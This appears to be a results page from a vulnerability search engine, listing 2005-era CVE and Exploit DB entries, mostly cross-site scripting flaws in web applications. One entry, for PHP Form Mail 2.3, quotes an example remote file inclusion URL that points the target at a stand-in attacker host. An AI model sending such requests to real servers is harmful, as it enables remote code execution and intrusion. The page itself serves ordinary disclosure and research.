CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

4545 matches found

Cvelist•added 2005/03/07 5:0 a.m.•10 views

CVE-2005-0656

Multiple cross-site scripting XSS vulnerabilities in auraCMS 1.5 allow remote attackers to inject arbitrary web script or HTML via the 1 hits parameter to hits.php, 2 query parameter to index.php, or 3 theCount parameter to counter.php...

5.8AI score0.00409EPSS

Exploits1References4

Cvelist•added 2005/03/07 5:0 a.m.•17 views

CVE-2005-0674

Cross-site scripting XSS vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request...

5.8AI score0.00444EPSS

Exploits0References4

Cvelist•added 2005/03/07 5:0 a.m.•16 views

CVE-2005-0660

Multiple cross-site scripting XSS vulnerabilities in D-Forum 1.11 allows remote attackers to inject arbitrary web script or HTML via certain fields, as demonstrated using the page parameter in nav.php3...

5.8AI score0.00297EPSS

Exploits0References2

Exploit DB•added 2005/03/05 12:0 a.m.•31 views

PHP Form Mail 2.3 - Arbitrary File Inclusion

Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...

7.4AI score

Exploits0

Cvelist•added 2005/03/04 5:0 a.m.•15 views

CVE-2005-0628

Multiple cross-site scripting XSS vulnerabilities in Forumwa 1.0 allow remote attackers to inject arbitrary web script or HTML via 1 the keyword parameter in search.php or the 2 body or 3 subject of a forum message...

5.8AI score0.00443EPSS

Exploits0References3

NVD•added 2005/03/02 5:0 a.m.•13 views

CVE-2005-0641

Cross-site scripting XSS vulnerability in the Reporter for Computer Associates CA Unicenter Asset Management UAM 4.0 allows remote attackers to inject arbitrary HTML or web script via the 1 name or 2 description in a report template...

4.3CVSS5.8AI score0.00281EPSS

Exploits0References2

NVD•added 2005/03/01 5:0 a.m.•12 views

CVE-2004-1055

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the PmaAbsoluteUri parameter, 2 the zerorows parameter in readdump.php, 3 the confirm form, or 4 an error message generated by the internal...

6.8CVSS5.7AI score0.01171EPSS

Exploits1References3

NVD•added 2005/03/01 5:0 a.m.•16 views

CVE-2005-0629

Multiple cross-site scripting XSS vulnerabilities in profile.php in 427BB 2.2 allow remote attackers to inject arbitrary web script or HTML via the 1 user or 2 Avatar parameters...

4.3CVSS5.8AI score0.0943EPSS

Exploits0References6

Exploit DB•added 2005/03/01 12:0 a.m.•26 views

CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection

source: https://www.securityfocus.com/bid/12691/info A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. An attacker may leverage this...

7.4AI score

Exploits0

Cvelist•added 2005/02/26 5:0 a.m.•20 views

CVE-2004-1711

Cross-site scripting XSS vulnerability in post.php in Moodle before 1.3 allows remote attackers to inject arbitrary web script or HTML via the reply parameter...

5.7AI score0.00444EPSS

Exploits1References4

Cvelist•added 2005/02/26 5:0 a.m.•13 views

CVE-2004-1730

Cross-site scripting XSS vulnerability in Mantis bugtracker allows remote attackers to inject arbitrary web script or HTML via 1 the return parameter to loginpage.php, 2 e-mail field in signup.php, 3 action parameter to loginselectprojpage.php, or 4 hidestatus parameter to viewallset.php...

5.7AI score0.00622EPSS

Exploits1References7

Cvelist•added 2005/02/26 5:0 a.m.•13 views

CVE-2004-1716

Cross-site scripting XSS vulnerability in PForum before 1.26 allows remote attackers to inject arbitrary web script or HTML via the 1 IRC Server or 2 AIM ID fields in the user profile...

5.7AI score0.07281EPSS

Exploits1References7

Cvelist•added 2005/02/24 5:0 a.m.•21 views

CVE-2005-0534

Multiple cross-site scripting XSS vulnerabilities in MediaWiki 1.3.x before 1.3.11 and 1.4 beta before 1.4 rc1 allow remote attackers to inject arbitrary web script...

5.8AI score0.00444EPSS

Exploits0References4

Exploit DB•added 2005/02/21 12:0 a.m.•17 views

PANews 2.0 - PHP Remote Code Execution

source: https://www.securityfocus.com/bid/12611/info PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'adminsetup.php' script. Reports indicate that wh...

7.4AI score

Exploits0

Cvelist•added 2005/02/20 5:0 a.m.•19 views

CVE-2004-1589

Cross-site scripting XSS vulnerability in GoSmart Message Board allows remote attackers to execute inject web script or HTML via the 1 Category parameter to Forum.asp or 2 MainMessageID parameter to ReplyToQuestion.asp...

5.8AI score0.00409EPSS

Exploits1References4

Cvelist•added 2005/02/20 5:0 a.m.•14 views

CVE-2004-1690

Cross-site scripting XSS vulnerability in the Web Server in DNS4Me 3.0.0.4 allows remote attackers to execute arbitrary web script or HTML via the URL...

6AI score0.00871EPSS

Exploits1References6

Cvelist•added 2005/02/20 5:0 a.m.•18 views

CVE-2004-1594

Cross-site scripting XSS vulnerability in FuseTalk 4.0 allows remote attackers to execute arbitrary web script via an img src tag...

6.2AI score0.00444EPSS

Exploits1References4

Cvelist•added 2005/02/20 5:0 a.m.•13 views

CVE-2004-1632

Cross-site scripting XSS vulnerability in wiki.php in MoniWiki 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the arguments to wiki.php...

5.6AI score0.00444EPSS

Exploits1References4

Cvelist•added 2005/02/19 5:0 a.m.•15 views

CVE-2004-1499

Cross-site scripting XSS vulnerability in the compose message form in HELM 3.1.19 and earlier allows remote attackers to execute arbitrary web script or HTML via the Subject field...

6.1AI score0.00594EPSS

Exploits1References5

Cvelist•added 2005/02/19 5:0 a.m.•13 views

CVE-2005-0477

Cross-site scripting XSS vulnerability in the SML code for Invision Power Board 1.3.1 FINAL allows remote attackers to inject arbitrary web script via 1 a signature file or 2 a message post containing an IMG tag within a COLOR tag whose style is set to background:url...

6AI score0.00548EPSS

Exploits0References2

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by